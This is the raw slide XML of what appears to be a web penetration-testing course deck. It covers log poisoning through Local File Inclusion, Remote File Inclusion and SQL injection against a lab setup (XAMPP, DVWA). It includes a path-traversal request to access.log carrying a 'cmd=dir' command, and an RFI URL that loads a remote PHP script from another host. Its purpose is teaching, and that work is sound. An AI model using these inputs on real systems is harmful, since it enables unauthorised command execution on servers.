          <p:cNvPr id="612"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Since we can access certain file (such as access.log), it is  possible we can put malicious code together with Local File Inclusion technique.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>With this malicious code, we can execute any commands of our choice on a target machine.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>We put the malicious code with User-Agent</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This technique also called Log Poisoning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>We intercept request using Burp Suite</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="615" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="515268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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8915040" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Change User-Agent with malicious code and click “Forward”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5105160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2286000"/>
            <a:ext cx="990360" cy="30456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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="8534160" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Access the file again and we have an error</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="622" name="Picture 2"/>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8610120" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>../../apache/logs/access.log&amp;cmd=dir</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="8610120" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Remote File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
http://192.168.56.10/rfi/include.php?index=http://10.19.139.221/pentest.php</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="628" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="5181120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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457200" y="-228600"/>
            <a:ext cx="9143640" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Open php.ini and set to “On”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="631" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295280"/>
            <a:ext cx="8229240" cy="495252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Double gray box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Analyst engages the target with limited knowledge of its defenses and assets and full knowledge of channels. The target is notified in advance of the scope and time frame of the audit but not the channels tested or the test vectors. A double gray box audit tests the skills of the Analyst and the target’s preparedness to unknown variables of agitation. The breadth and depth depends upon the quality of the information provided to the Analyst and the target before the test as well as the Analyst’s applicable knowledge. This is also known as a White Box test.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264"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65"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66"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58EA3BA3-4B9E-4FE0-BC87-E8B556B24860}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="8534160" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Now RFI is done</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="634"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="8915040" cy="4571640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Sql injection vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637"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638"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639"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C9269AAB-AF51-4F30-9446-A8C678F9F53A}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:r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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="5562360" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>What is it?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injection is an attack in which SQL code is inserted or appended into </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>application user input parameters that are later passed to a back-end SQL server </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>for parsing and execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The primary form of SQL injection consists of direct insertion of code into parameters </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>that are concatenated with SQL commands and executed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>A successful SQL injection exploit can read sensitive data from the database, modify </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>database data (Insert/Update/Delete), execute administration operations on the </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>database (such as shutdown the DBMS), recover the content of a given file present </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>on the DBMS file system and in some cases issue commands to the operating </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>system. SQL injection attacks are a type of injection attack, in which SQL commands </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>are injected into data-plane input in order to effect the execution of predefined SQL </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643"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We will focus on SQL Injection vulnerability : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1. Bypass login form using SQL injection command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2. Testing SQL Injection with error-based using manual injection approach. Later on, we will include malicious code using SQL injection command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Requirement :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XAMPP server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Damn Vulnerable Web Application</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Basic SQL commands </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
